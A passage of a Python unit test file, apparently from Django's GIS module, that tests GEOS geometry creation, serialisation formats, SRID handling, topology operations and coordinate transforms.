self.assertEqual(ogc_hex_3d, pnt_3d.hex)
# HEXEWKB should be appropriate for its dimension -- have to use an
# a WKBWriter w/dimension set accordingly, else GEOS will insert
# garbage into 3D coordinate if there is none.
self.assertEqual(hexewkb_2d, pnt_2d.hexewkb)
self.assertEqual(hexewkb_3d, pnt_3d.hexewkb)
self.assertEqual(True, GEOSGeometry(hexewkb_3d).hasz)
# Same for EWKB.
self.assertEqual(six.memoryview(a2b_hex(hexewkb_2d)), pnt_2d.ewkb)
self.assertEqual(six.memoryview(a2b_hex(hexewkb_3d)), pnt_3d.ewkb)
# Redundant sanity check.
self.assertEqual(4326, GEOSGeometry(hexewkb_2d).srid)
def test_kml(self):
"Testing KML output."
for tg in self.geometries.wkt_out:
geom = fromstr(tg.wkt)
kml = getattr(tg, 'kml', False)
if kml:
self.assertEqual(kml, geom.kml)
def test_errors(self):
"Testing the Error handlers."
# string-based
for err in self.geometries.errors:
with self.assertRaises((GEOSException, ValueError)):
fromstr(err.wkt)
# Bad WKB
self.assertRaises(GEOSException, GEOSGeometry, six.memoryview(b'0'))
class NotAGeometry(object):
pass
# Some other object
self.assertRaises(TypeError, GEOSGeometry, NotAGeometry())
# None
self.assertRaises(TypeError, GEOSGeometry, None)
def test_wkb(self):
"Testing WKB output."
for g in self.geometries.hex_wkt:
geom = fromstr(g.wkt)
wkb = geom.wkb
self.assertEqual(b2a_hex(wkb).decode().upper(), g.hex)
def test_create_hex(self):
"Testing creation from HEX."
for g in self.geometries.hex_wkt:
geom_h = GEOSGeometry(g.hex)
# we need to do this so decimal places get normalized
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test_create_wkb(self):
"Testing creation from WKB."
for g in self.geometries.hex_wkt:
wkb = six.memoryview(a2b_hex(g.hex.encode()))
geom_h = GEOSGeometry(wkb)
# we need to do this so decimal places get normalized
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test_ewkt(self):
"Testing EWKT."
srids = (-1, 32140)
for srid in srids:
for p in self.geometries.polygons:
ewkt = 'SRID=%d;%s' % (srid, p.wkt)
poly = fromstr(ewkt)
self.assertEqual(srid, poly.srid)
self.assertEqual(srid, poly.shell.srid)
self.assertEqual(srid, fromstr(poly.ewkt).srid) # Checking export
@skipUnless(HAS_GDAL, "GDAL is required.")
def test_json(self):
"Testing GeoJSON input/output (via GDAL)."
for g in self.geometries.json_geoms:
geom = GEOSGeometry(g.wkt)
if not hasattr(g, 'not_equal'):
# Loading jsons to prevent decimal differences
self.assertEqual(json.loads(g.json), json.loads(geom.json))
self.assertEqual(json.loads(g.json), json.loads(geom.geojson))
self.assertEqual(GEOSGeometry(g.wkt), GEOSGeometry(geom.json))
def test_fromfile(self):
"Testing the fromfile() factory."
ref_pnt = GEOSGeometry('POINT(5 23)')
wkt_f = BytesIO()
wkt_f.write(force_bytes(ref_pnt.wkt))
wkb_f = BytesIO()
wkb_f.write(bytes(ref_pnt.wkb))
# Other tests use `fromfile()` on string filenames so those
# aren't tested here.
for fh in (wkt_f, wkb_f):
fh.seek(0)
pnt = fromfile(fh)
self.assertEqual(ref_pnt, pnt)
def test_eq(self):
"Testing equivalence."
p = fromstr('POINT(5 23)')
self.assertEqual(p, p.wkt)
self.assertNotEqual(p, 'foo')
ls = fromstr('LINESTRING(0 0, 1 1, 5 5)')
self.assertEqual(ls, ls.wkt)
self.assertNotEqual(p, 'bar')
# Error shouldn't be raise on equivalence testing with
# an invalid type.
for g in (p, ls):
self.assertNotEqual(g, None)
self.assertNotEqual(g, {'foo': 'bar'})
self.assertNotEqual(g, False)
def test_points(self):
"Testing Point objects."
prev = fromstr('POINT(0 0)')
for p in self.geometries.points:
# Creating the point from the WKT
pnt = fromstr(p.wkt)
self.assertEqual(pnt.geom_type, 'Point')
self.assertEqual(pnt.geom_typeid, 0)
self.assertEqual(pnt.dims, 0)
self.assertEqual(p.x, pnt.x)
self.assertEqual(p.y, pnt.y)
self.assertEqual(pnt, fromstr(p.wkt))
self.assertEqual(False, pnt == prev) # Use assertEqual to test __eq__
# Making sure that the point's X, Y components are what we expect
self.assertAlmostEqual(p.x, pnt.tuple[0], 9)
self.assertAlmostEqual(p.y, pnt.tuple[1], 9)
# Testing the third dimension, and getting the tuple arguments
if hasattr(p, 'z'):
self.assertEqual(True, pnt.hasz)
self.assertEqual(p.z, pnt.z)
self.assertEqual(p.z, pnt.tuple[2], 9)
tup_args = (p.x, p.y, p.z)
set_tup1 = (2.71, 3.14, 5.23)
set_tup2 = (5.23, 2.71, 3.14)
else:
self.assertEqual(False, pnt.hasz)
self.assertIsNone(pnt.z)
tup_args = (p.x, p.y)
set_tup1 = (2.71, 3.14)
set_tup2 = (3.14, 2.71)
# Centroid operation on point should be point itself
self.assertEqual(p.centroid, pnt.centroid.tuple)
# Now testing the different constructors
pnt2 = Point(tup_args) # e.g., Point((1, 2))
pnt3 = Point(*tup_args) # e.g., Point(1, 2)
self.assertEqual(pnt, pnt2)
self.assertEqual(pnt, pnt3)
# Now testing setting the x and y
pnt.y = 3.14
pnt.x = 2.71
self.assertEqual(3.14, pnt.y)
self.assertEqual(2.71, pnt.x)
# Setting via the tuple/coords property
pnt.tuple = set_tup1
self.assertEqual(set_tup1, pnt.tuple)
pnt.coords = set_tup2
self.assertEqual(set_tup2, pnt.coords)
prev = pnt # setting the previous geometry
def test_multipoints(self):
"Testing MultiPoint objects."
for mp in self.geometries.multipoints:
mpnt = fromstr(mp.wkt)
self.assertEqual(mpnt.geom_type, 'MultiPoint')
self.assertEqual(mpnt.geom_typeid, 4)
self.assertEqual(mpnt.dims, 0)
self.assertAlmostEqual(mp.centroid[0], mpnt.centroid.tuple[0], 9)
self.assertAlmostEqual(mp.centroid[1], mpnt.centroid.tuple[1], 9)
self.assertRaises(IndexError, mpnt.__getitem__, len(mpnt))
self.assertEqual(mp.centroid, mpnt.centroid.tuple)
self.assertEqual(mp.coords, tuple(m.tuple for m in mpnt))
for p in mpnt:
self.assertEqual(p.geom_type, 'Point')
self.assertEqual(p.geom_typeid, 0)
self.assertEqual(p.empty, False)
self.assertEqual(p.valid, True)
def test_linestring(self):
"Testing LineString objects."
prev = fromstr('POINT(0 0)')
for l in self.geometries.linestrings:
ls = fromstr(l.wkt)
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertEqual(ls.dims, 1)
self.assertEqual(ls.empty, False)
self.assertEqual(ls.ring, False)
if hasattr(l, 'centroid'):
self.assertEqual(l.centroid, ls.centroid.tuple)
if hasattr(l, 'tup'):
self.assertEqual(l.tup, ls.tuple)
self.assertEqual(ls, fromstr(l.wkt))
self.assertEqual(False, ls == prev) # Use assertEqual to test __eq__
self.assertRaises(IndexError, ls.__getitem__, len(ls))
prev = ls
# Creating a LineString from a tuple, list, and numpy array
self.assertEqual(ls, LineString(ls.tuple)) # tuple
self.assertEqual(ls, LineString(*ls.tuple)) # as individual arguments
self.assertEqual(ls, LineString([list(tup) for tup in ls.tuple])) # as list
# Point individual arguments
self.assertEqual(ls.wkt, LineString(*tuple(Point(tup) for tup in ls.tuple)).wkt)
if numpy:
self.assertEqual(ls, LineString(numpy.array(ls.tuple))) # as numpy array
def test_multilinestring(self):
"Testing MultiLineString objects."
prev = fromstr('POINT(0 0)')
for l in self.geometries.multilinestrings:
ml = fromstr(l.wkt)
self.assertEqual(ml.geom_type, 'MultiLineString')
self.assertEqual(ml.geom_typeid, 5)
self.assertEqual(ml.dims, 1)
self.assertAlmostEqual(l.centroid[0], ml.centroid.x, 9)
self.assertAlmostEqual(l.centroid[1], ml.centroid.y, 9)
self.assertEqual(ml, fromstr(l.wkt))
self.assertEqual(False, ml == prev) # Use assertEqual to test __eq__
prev = ml
for ls in ml:
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertEqual(ls.empty, False)
self.assertRaises(IndexError, ml.__getitem__, len(ml))
self.assertEqual(ml.wkt, MultiLineString(*tuple(s.clone() for s in ml)).wkt)
self.assertEqual(ml, MultiLineString(*tuple(LineString(s.tuple) for s in ml)))
def test_linearring(self):
"Testing LinearRing objects."
for rr in self.geometries.linearrings:
lr = fromstr(rr.wkt)
self.assertEqual(lr.geom_type, 'LinearRing')
self.assertEqual(lr.geom_typeid, 2)
self.assertEqual(lr.dims, 1)
self.assertEqual(rr.n_p, len(lr))
self.assertEqual(True, lr.valid)
self.assertEqual(False, lr.empty)
# Creating a LinearRing from a tuple, list, and numpy array
self.assertEqual(lr, LinearRing(lr.tuple))
self.assertEqual(lr, LinearRing(*lr.tuple))
self.assertEqual(lr, LinearRing([list(tup) for tup in lr.tuple]))
if numpy:
self.assertEqual(lr, LinearRing(numpy.array(lr.tuple)))
def test_polygons_from_bbox(self):
"Testing `from_bbox` class method."
bbox = (-180, -90, 180, 90)
p = Polygon.from_bbox(bbox)
self.assertEqual(bbox, p.extent)
# Testing numerical precision
x = 3.14159265358979323
bbox = (0, 0, 1, x)
p = Polygon.from_bbox(bbox)
y = p.extent[-1]
self.assertEqual(format(x, '.13f'), format(y, '.13f'))
def test_polygons(self):
"Testing Polygon objects."
prev = fromstr('POINT(0 0)')
for p in self.geometries.polygons:
# Creating the Polygon, testing its properties.
poly = fromstr(p.wkt)
self.assertEqual(poly.geom_type, 'Polygon')
self.assertEqual(poly.geom_typeid, 3)
self.assertEqual(poly.dims, 2)
self.assertEqual(poly.empty, False)
self.assertEqual(poly.ring, False)
self.assertEqual(p.n_i, poly.num_interior_rings)
self.assertEqual(p.n_i + 1, len(poly)) # Testing __len__
self.assertEqual(p.n_p, poly.num_points)
# Area & Centroid
self.assertAlmostEqual(p.area, poly.area, 9)
self.assertAlmostEqual(p.centroid[0], poly.centroid.tuple[0], 9)
self.assertAlmostEqual(p.centroid[1], poly.centroid.tuple[1], 9)
# Testing the geometry equivalence
self.assertEqual(poly, fromstr(p.wkt))
# Should not be equal to previous geometry
self.assertEqual(False, poly == prev) # Use assertEqual to test __eq__
self.assertNotEqual(poly, prev) # Use assertNotEqual to test __ne__
# Testing the exterior ring
ring = poly.exterior_ring
self.assertEqual(ring.geom_type, 'LinearRing')
self.assertEqual(ring.geom_typeid, 2)
if p.ext_ring_cs:
self.assertEqual(p.ext_ring_cs, ring.tuple)
self.assertEqual(p.ext_ring_cs, poly[0].tuple) # Testing __getitem__
# Testing __getitem__ and __setitem__ on invalid indices
self.assertRaises(IndexError, poly.__getitem__, len(poly))
self.assertRaises(IndexError, poly.__setitem__, len(poly), False)
self.assertRaises(IndexError, poly.__getitem__, -1 * len(poly) - 1)
# Testing __iter__
for r in poly:
self.assertEqual(r.geom_type, 'LinearRing')
self.assertEqual(r.geom_typeid, 2)
# Testing polygon construction.
self.assertRaises(TypeError, Polygon, 0, [1, 2, 3])
self.assertRaises(TypeError, Polygon, 'foo')
# Polygon(shell, (hole1, ... holeN))
rings = tuple(r for r in poly)
self.assertEqual(poly, Polygon(rings[0], rings[1:]))
# Polygon(shell_tuple, hole_tuple1, ... , hole_tupleN)
ring_tuples = tuple(r.tuple for r in poly)
self.assertEqual(poly, Polygon(*ring_tuples))
# Constructing with tuples of LinearRings.
self.assertEqual(poly.wkt, Polygon(*tuple(r for r in poly)).wkt)
self.assertEqual(poly.wkt, Polygon(*tuple(LinearRing(r.tuple) for r in poly)).wkt)
def test_polygons_templates(self):
# Accessing Polygon attributes in templates should work.
engine = Engine()
template = engine.from_string('{{ polygons.0.wkt }}')
polygons = [fromstr(p.wkt) for p in self.geometries.multipolygons[:2]]
content = template.render(Context({'polygons': polygons}))
self.assertIn('MULTIPOLYGON (((100', content)
def test_polygon_comparison(self):
p1 = Polygon(((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
p2 = Polygon(((0, 0), (0, 1), (1, 0), (0, 0)))
self.assertGreater(p1, p2)
self.assertLess(p2, p1)
p3 = Polygon(((0, 0), (0, 1), (1, 1), (2, 0), (0, 0)))
p4 = Polygon(((0, 0), (0, 1), (2, 2), (1, 0), (0, 0)))
self.assertGreater(p4, p3)
self.assertLess(p3, p4)
def test_multipolygons(self):
"Testing MultiPolygon objects."
fromstr('POINT (0 0)')
for mp in self.geometries.multipolygons:
mpoly = fromstr(mp.wkt)
self.assertEqual(mpoly.geom_type, 'MultiPolygon')
self.assertEqual(mpoly.geom_typeid, 6)
self.assertEqual(mpoly.dims, 2)
self.assertEqual(mp.valid, mpoly.valid)
if mp.valid:
self.assertEqual(mp.num_geom, mpoly.num_geom)
self.assertEqual(mp.n_p, mpoly.num_coords)
self.assertEqual(mp.num_geom, len(mpoly))
self.assertRaises(IndexError, mpoly.__getitem__, len(mpoly))
for p in mpoly:
self.assertEqual(p.geom_type, 'Polygon')
self.assertEqual(p.geom_typeid, 3)
self.assertEqual(p.valid, True)
self.assertEqual(mpoly.wkt, MultiPolygon(*tuple(poly.clone() for poly in mpoly)).wkt)
def test_memory_hijinks(self):
"Testing Geometry __del__() on rings and polygons."
# #### Memory issues with rings and poly
# These tests are needed to ensure sanity with writable geometries.
# Getting a polygon with interior rings, and pulling out the interior rings
poly = fromstr(self.geometries.polygons[1].wkt)
ring1 = poly[0]
ring2 = poly[1]
# These deletes should be 'harmless' since they are done on child geometries
del ring1
del ring2
ring1 = poly[0]
ring2 = poly[1]
# Deleting the polygon
del poly
# Access to these rings is OK since they are clones.
str(ring1)
str(ring2)
def test_coord_seq(self):
"Testing Coordinate Sequence objects."
for p in self.geometries.polygons:
if p.ext_ring_cs:
# Constructing the polygon and getting the coordinate sequence
poly = fromstr(p.wkt)
cs = poly.exterior_ring.coord_seq
self.assertEqual(p.ext_ring_cs, cs.tuple) # done in the Polygon test too.
self.assertEqual(len(p.ext_ring_cs), len(cs)) # Making sure __len__ works
# Checks __getitem__ and __setitem__
for i in range(len(p.ext_ring_cs)):
c1 = p.ext_ring_cs[i] # Expected value
c2 = cs[i] # Value from coordseq
self.assertEqual(c1, c2)
# Constructing the test value to set the coordinate sequence with
if len(c1) == 2:
tset = (5, 23)
else:
tset = (5, 23, 8)
cs[i] = tset
# Making sure every set point matches what we expect
for j in range(len(tset)):
cs[i] = tset
self.assertEqual(tset[j], cs[i][j])
def test_relate_pattern(self):
"Testing relate() and relate_pattern()."
g = fromstr('POINT (0 0)')
self.assertRaises(GEOSException, g.relate_pattern, 0, 'invalid pattern, yo')
for rg in self.geometries.relate_geoms:
a = fromstr(rg.wkt_a)
b = fromstr(rg.wkt_b)
self.assertEqual(rg.result, a.relate_pattern(b, rg.pattern))
self.assertEqual(rg.pattern, a.relate(b))
def test_intersection(self):
"Testing intersects() and intersection()."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
i1 = fromstr(self.geometries.intersect_geoms[i].wkt)
self.assertEqual(True, a.intersects(b))
i2 = a.intersection(b)
self.assertEqual(i1, i2)
self.assertEqual(i1, a & b) # __and__ is intersection operator
a &= b # testing __iand__
self.assertEqual(i1, a)
def test_union(self):
"Testing union()."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
u1 = fromstr(self.geometries.union_geoms[i].wkt)
u2 = a.union(b)
self.assertEqual(u1, u2)
self.assertEqual(u1, a | b) # __or__ is union operator
a |= b # testing __ior__
self.assertEqual(u1, a)
def test_difference(self):
"Testing difference()."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
d1 = fromstr(self.geometries.diff_geoms[i].wkt)
d2 = a.difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a - b) # __sub__ is difference operator
a -= b # testing __isub__
self.assertEqual(d1, a)
def test_symdifference(self):
"Testing sym_difference()."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
d1 = fromstr(self.geometries.sdiff_geoms[i].wkt)
d2 = a.sym_difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a ^ b) # __xor__ is symmetric difference operator
a ^= b # testing __ixor__
self.assertEqual(d1, a)
def test_buffer(self):
"Testing buffer()."
for bg in self.geometries.buffer_geoms:
g = fromstr(bg.wkt)
# The buffer we expect
exp_buf = fromstr(bg.buffer_wkt)
quadsegs = bg.quadsegs
width = bg.width
# Can't use a floating-point for the number of quadsegs.
self.assertRaises(ctypes.ArgumentError, g.buffer, width, float(quadsegs))
# Constructing our buffer
buf = g.buffer(width, quadsegs)
self.assertEqual(exp_buf.num_coords, buf.num_coords)
self.assertEqual(len(exp_buf), len(buf))
# Now assuring that each point in the buffer is almost equal
for j in range(len(exp_buf)):
exp_ring = exp_buf[j]
buf_ring = buf[j]
self.assertEqual(len(exp_ring), len(buf_ring))
for k in range(len(exp_ring)):
# Asserting the X, Y of each point are almost equal (due to floating point imprecision)
self.assertAlmostEqual(exp_ring[k][0], buf_ring[k][0], 9)
self.assertAlmostEqual(exp_ring[k][1], buf_ring[k][1], 9)
def test_srid(self):
"Testing the SRID property and keyword."
# Testing SRID keyword on Point
pnt = Point(5, 23, srid=4326)
self.assertEqual(4326, pnt.srid)
pnt.srid = 3084
self.assertEqual(3084, pnt.srid)
self.assertRaises(ctypes.ArgumentError, pnt.set_srid, '4326')
# Testing SRID keyword on fromstr(), and on Polygon rings.
poly = fromstr(self.geometries.polygons[1].wkt, srid=4269)
self.assertEqual(4269, poly.srid)
for ring in poly:
self.assertEqual(4269, ring.srid)
poly.srid = 4326
self.assertEqual(4326, poly.shell.srid)
# Testing SRID keyword on GeometryCollection
gc = GeometryCollection(Point(5, 23), LineString((0, 0), (1.5, 1.5), (3, 3)), srid=32021)
self.assertEqual(32021, gc.srid)
for i in range(len(gc)):
self.assertEqual(32021, gc[i].srid)
# GEOS may get the SRID from HEXEWKB
# 'POINT(5 23)' at SRID=4326 in hex form -- obtained from PostGIS
# using `SELECT GeomFromText('POINT (5 23)', 4326);`.
hex = '0101000020E610000000000000000014400000000000003740'
p1 = fromstr(hex)
self.assertEqual(4326, p1.srid)
p2 = fromstr(p1.hex)
self.assertIsNone(p2.srid)
p3 = fromstr(p1.hex, srid=-1) # -1 is intended.
self.assertEqual(-1, p3.srid)
# Testing that geometry SRID could be set to its own value
pnt_wo_srid = Point(1, 1)
pnt_wo_srid.srid = pnt_wo_srid.srid
@skipUnless(HAS_GDAL, "GDAL is required.")
def test_custom_srid(self):
"""Test with a null srid and a srid unknown to GDAL."""
for srid in [None, 999999]:
pnt = Point(111200, 220900, srid=srid)
self.assertTrue(pnt.ewkt.startswith(("SRID=%s;" % srid if srid else '') + "POINT (111200.0"))
self.assertIsInstance(pnt.ogr, gdal.OGRGeometry)
self.assertIsNone(pnt.srs)
# Test conversion from custom to a known srid
c2w = gdal.CoordTransform(
gdal.SpatialReference(
'+proj=mill +lat_0=0 +lon_0=0 +x_0=0 +y_0=0 +R_A +ellps=WGS84 '
'+datum=WGS84 +units=m +no_defs'
),
gdal.SpatialReference(4326))
new_pnt = pnt.transform(c2w, clone=True)
self.assertEqual(new_pnt.srid, 4326)
self.assertAlmostEqual(new_pnt.x, 1, 3)
self.assertAlmostEqual(new_pnt.y, 2, 3)
def test_mutable_geometries(self):
"Testing the mutability of Polygons and Geometry Collections."
# ### Testing the mutability of Polygons ###
for p in self.geometries.polygons:
poly = fromstr(p.wkt)
# Should only be able to use __setitem__ with LinearRing geometries.
self.assertRaises(TypeError, poly.__setitem__, 0, LineString((1, 1), (2, 2)))
# Constructing the new shell by adding 500 to every point in the old shell.
shell_tup = poly.shell.tuple
new_coords = []
for point in shell_tup:
new_coords.append((point[0] + 500., point[1] + 500.))
new_shell = LinearRing(*tuple(new_coords))
# Assigning polygon's exterior ring w/the new shell
poly.exterior_ring = new_shell
str(new_shell) # new shell is still accessible
self.assertEqual(poly.exterior_ring, new_shell)
self.assertEqual(poly[0], new_shell)
# ### Testing the mutability of Geometry Collections
for tg in self.geometries.multipoints:
mp = fromstr(tg.wkt)
for i in range(len(mp)):
# Creating a random point.
pnt = mp[i]
new = Point(random.randint(21, 100), random.randint(21, 100))
# Testing the assignment
mp[i] = new
str(new) # what was used for the assignment is still accessible
self.assertEqual(mp[i], new)
self.assertEqual(mp[i].wkt, new.wkt)
self.assertNotEqual(pnt, mp[i])
# MultiPolygons involve much more memory management because each
# Polygon w/in the collection has its own rings.
for tg in self.geometries.multipolygons:
mpoly = fromstr(tg.wkt)
for i in range(len(mpoly)):
poly = mpoly[i]
old_poly = mpoly[i]
# Offsetting the each ring in the polygon by 500.
for j in range(len(poly)):
r = poly[j]
for k in range(len(r)):
r[k] = (r[k][0] + 500., r[k][1] + 500.)
poly[j] = r
self.assertNotEqual(mpoly[i], poly)
# Testing the assignment
mpoly[i] = poly
str(poly) # Still accessible
self.assertEqual(mpoly[i], poly)
self.assertNotEqual(mpoly[i], old_poly)
# Extreme (!!) __setitem__ -- no longer works, have to detect
# in the first object that __setitem__ is called in the subsequent
# objects -- maybe mpoly[0, 0, 0] = (3.14, 2.71)?
# mpoly[0][0][0] = (3.14, 2.71)
# self.assertEqual((3.14, 2.71), mpoly[0][0][0])
# Doing it more slowly..
# self.assertEqual((3.14, 2.71), mpoly[0].shell[0])
# del mpoly
def test_point_list_assignment(self):
p = Point(0, 0)
p[:] = (1, 2, 3)
self.assertEqual(p, Point(1, 2, 3))
p[:] = (1, 2)
self.assertEqual(p.wkt, Point(1, 2))
with self.assertRaises(ValueError):
p[:] = (1,)
with self.assertRaises(ValueError):
p[:] = (1, 2, 3, 4, 5)
def test_linestring_list_assignment(self):
ls = LineString((0, 0), (1, 1))
ls[:] = ((0, 0), (1, 1), (2, 2))
self.assertEqual(ls, LineString((0, 0), (1, 1), (2, 2)))
with self.assertRaises(ValueError):
ls[:] = (1,)
def test_linearring_list_assignment(self):
ls = LinearRing((0, 0), (0, 1), (1, 1), (0, 0))
ls[:] = ((0, 0), (0, 1), (1, 1), (1, 0), (0, 0))
self.assertEqual(ls, LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
with self.assertRaises(ValueError):
ls[:] = ((0, 0), (1, 1), (2, 2))
def test_threed(self):
"Testing three-dimensional geometries."
# Testing a 3D Point
pnt = Point(2, 3, 8)
self.assertEqual((2., 3., 8.), pnt.coords)
self.assertRaises(TypeError, pnt.set_coords, (1., 2.))
pnt.coords = (1., 2., 3.)
self.assertEqual((1., 2., 3.), pnt.coords)
# Testing a 3D LineString
ls = LineString((2., 3., 8.), (50., 250., -117.))
self.assertEqual(((2., 3., 8.), (50., 250., -117.)), ls.tuple)
self.assertRaises(TypeError, ls.__setitem__, 0, (1., 2.))
ls[0] = (1., 2., 3.)
self.assertEqual((1., 2., 3.), ls[0])
def test_distance(self):
"Testing the distance() function."
# Distance to self should be 0.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.distance(Point(0, 0)))
# Distance should be 1
self.assertEqual(1.0, pnt.distance(Point(0, 1)))
# Distance should be ~ sqrt(2)
self.assertAlmostEqual(1.41421356237, pnt.distance(Point(1, 1)), 11)
# Distances are from the closest vertex in each geometry --
# should be 3 (distance from (2, 2) to (5, 2)).
ls1 = LineString((0, 0), (1, 1), (2, 2))
ls2 = LineString((5, 2), (6, 1), (7, 0))
self.assertEqual(3, ls1.distance(ls2))
def test_length(self):
"Testing the length property."
# Points have 0 length.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.length)
# Should be ~ sqrt(2)
ls = LineString((0, 0), (1, 1))
self.assertAlmostEqual(1.41421356237, ls.length, 11)
# Should be circumference of Polygon
poly = Polygon(LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
self.assertEqual(4.0, poly.length)
# Should be sum of each element's length in collection.
mpoly = MultiPolygon(poly.clone(), poly)
self.assertEqual(8.0, mpoly.length)
def test_emptyCollections(self):
"Testing empty geometries and collections."
gc1 = GeometryCollection([])
gc2 = fromstr('GEOMETRYCOLLECTION EMPTY')
pnt = fromstr('POINT EMPTY')
ls = fromstr('LINESTRING EMPTY')
poly = fromstr('POLYGON EMPTY')
mls = fromstr('MULTILINESTRING EMPTY')
mpoly1 = fromstr('MULTIPOLYGON EMPTY')
mpoly2 = MultiPolygon(())
for g in [gc1, gc2, pnt, ls, poly, mls, mpoly1, mpoly2]:
self.assertEqual(True, g.empty)
# Testing len() and num_geom.
if isinstance(g, Polygon):
self.assertEqual(1, len(g)) # Has one empty linear ring
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g[0]))
elif isinstance(g, (Point, LineString)):
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g))
else:
self.assertEqual(0, g.num_geom)
self.assertEqual(0, len(g))
# Testing __getitem__ (doesn't work on Point or Polygon)
if isinstance(g, Point):
self.assertRaises(IndexError, g.get_x)
elif isinstance(g, Polygon):
lr = g.shell
self.assertEqual('LINEARRING EMPTY', lr.wkt)
self.assertEqual(0, len(lr))
self.assertEqual(True, lr.empty)
self.assertRaises(IndexError, lr.__getitem__, 0)
else:
self.assertRaises(IndexError, g.__getitem__, 0)
def test_collection_dims(self):
gc = GeometryCollection([])
self.assertEqual(gc.dims, -1)
gc = GeometryCollection(Point(0, 0))
self.assertEqual(gc.dims, 0)
gc = GeometryCollection(LineString((0, 0), (1, 1)), Point(0, 0))
self.assertEqual(gc.dims, 1)
gc = GeometryCollection(LineString((0, 0), (1, 1)), Polygon(((0, 0), (0, 1), (1, 1), (0, 0))), Point(0, 0))
self.assertEqual(gc.dims, 2)
def test_collections_of_collections(self):
"Testing GeometryCollection handling of other collections."
# Creating a GeometryCollection WKT string composed of other
# collections and polygons.
coll = [mp.wkt for mp in self.geometries.multipolygons if mp.valid]
coll.extend(mls.wkt for mls in self.geometries.multilinestrings)
coll.extend(p.wkt for p in self.geometries.polygons)
coll.extend(mp.wkt for mp in self.geometries.multipoints)
gc_wkt = 'GEOMETRYCOLLECTION(%s)' % ','.join(coll)
# Should construct ok from WKT
gc1 = GEOSGeometry(gc_wkt)
# Should also construct ok from individual geometry arguments.
gc2 = GeometryCollection(*tuple(g for g in gc1))
# And, they should be equal.
self.assertEqual(gc1, gc2)
@skipUnless(HAS_GDAL, "GDAL is required.")
def test_gdal(self):
"Testing `ogr` and `srs` properties."
g1 = fromstr('POINT(5 23)')
self.assertIsInstance(g1.ogr, gdal.OGRGeometry)
self.assertIsNone(g1.srs)
g1_3d = fromstr('POINT(5 23 8)')
self.assertIsInstance(g1_3d.ogr, gdal.OGRGeometry)
self.assertEqual(g1_3d.ogr.z, 8)
g2 = fromstr('LINESTRING(0 0, 5 5, 23 23)', srid=4326)
self.assertIsInstance(g2.ogr, gdal.OGRGeometry)
self.assertIsInstance(g2.srs, gdal.SpatialReference)
self.assertEqual(g2.hex, g2.ogr.hex)
self.assertEqual('WGS 84', g2.srs.name)
def test_copy(self):
"Testing use with the Python `copy` module."
import copy
poly = GEOSGeometry('POLYGON((0 0, 0 23, 23 23, 23 0, 0 0), (5 5, 5 10, 10 10, 10 5, 5 5))')
cpy1 = copy.copy(poly)
cpy2 = copy.deepcopy(poly)
self.assertNotEqual(poly._ptr, cpy1._ptr)
self.assertNotEqual(poly._ptr, cpy2._ptr)
@skipUnless(HAS_GDAL, "GDAL is required to transform geometries")
def test_transform(self):
"Testing `transform` method."
orig = GEOSGeometry('POINT (-104.609 38.255)', 4326)
trans = GEOSGeometry('POINT (992385.4472045 481455.4944650)', 2774)
# Using a srid, a SpatialReference object, and a CoordTransform object
# for transformations.
t1, t2, t3 = orig.clone(), orig.clone(), orig.clone()
t1.transform(trans.srid)
t2.transform(gdal.SpatialReference('EPSG:2774'))
ct = gdal.CoordTransform(gdal.SpatialReference('WGS84'), gdal.SpatialReference(2774))
t3.transform(ct)
# Testing use of the `clone` keyword.
k1 = orig.clone()
k2 = k1.transform(trans.srid, clone=True)
self.assertEqual(k1, orig)
self.assertNotEqual(k1, k2)
prec = 3
for p in (t1, t2, t3, k2):
self.assertAlmostEqual(trans.x, p.x, prec)
self.assertAlmostEqual(trans.y, p.y, prec)
@skipUnless(HAS_GDAL, "GDAL is required to transform geometries")
def test_transform_3d(self):
p3d = GEOSGeometry('POINT (5 23 100)', 4326)
p3d.transform(2774)
self.assertEqual(p3d.z, 100)
@skipUnless(HAS_GDAL, "GDAL is required.")
def test_transform_noop(self):
""" Testing `transform` method (SRID match) """
# transform() should no-op if source & dest SRIDs match,
# regardless of whether GDAL is available.
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
gt = g.tuple
g.transform(4326)
self.assertEqual(g.tuple, gt)
self.assertEqual(g.srid, 4326)
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
g1 = g.transform(4326, clone=True)
self.assertEqual(g1.tuple, g.tuple)
self.assertEqual(g1.srid, 4326)
self.assertIsNot(g1, g, "Clone didn't happen")
with mock.patch('django.contrib.gis.gdal.HAS_GDAL', False):
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
gt = g.tuple
g.transform(4326)
self.assertEqual(g.tuple, gt)
self.assertEqual(g.srid, 4326)
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
g1 = g.transform(4326, clone=True)
self.assertEqual(g1.tuple, g.tuple)
self.assertEqual(g1.srid, 4326)
self.assertIsNot(g1, g, "Clone didn't happen")
@skipUnless(HAS_GDAL, "GDAL is required.")
def test_transform_nosrid(self):
""" Testing `transform` method (no SRID or negative SRID) """
g = GEOSGeometry('POINT (-104.609 38.255)', srid=None)
self.assertRaises(GEOSException, g.transform, 2774)
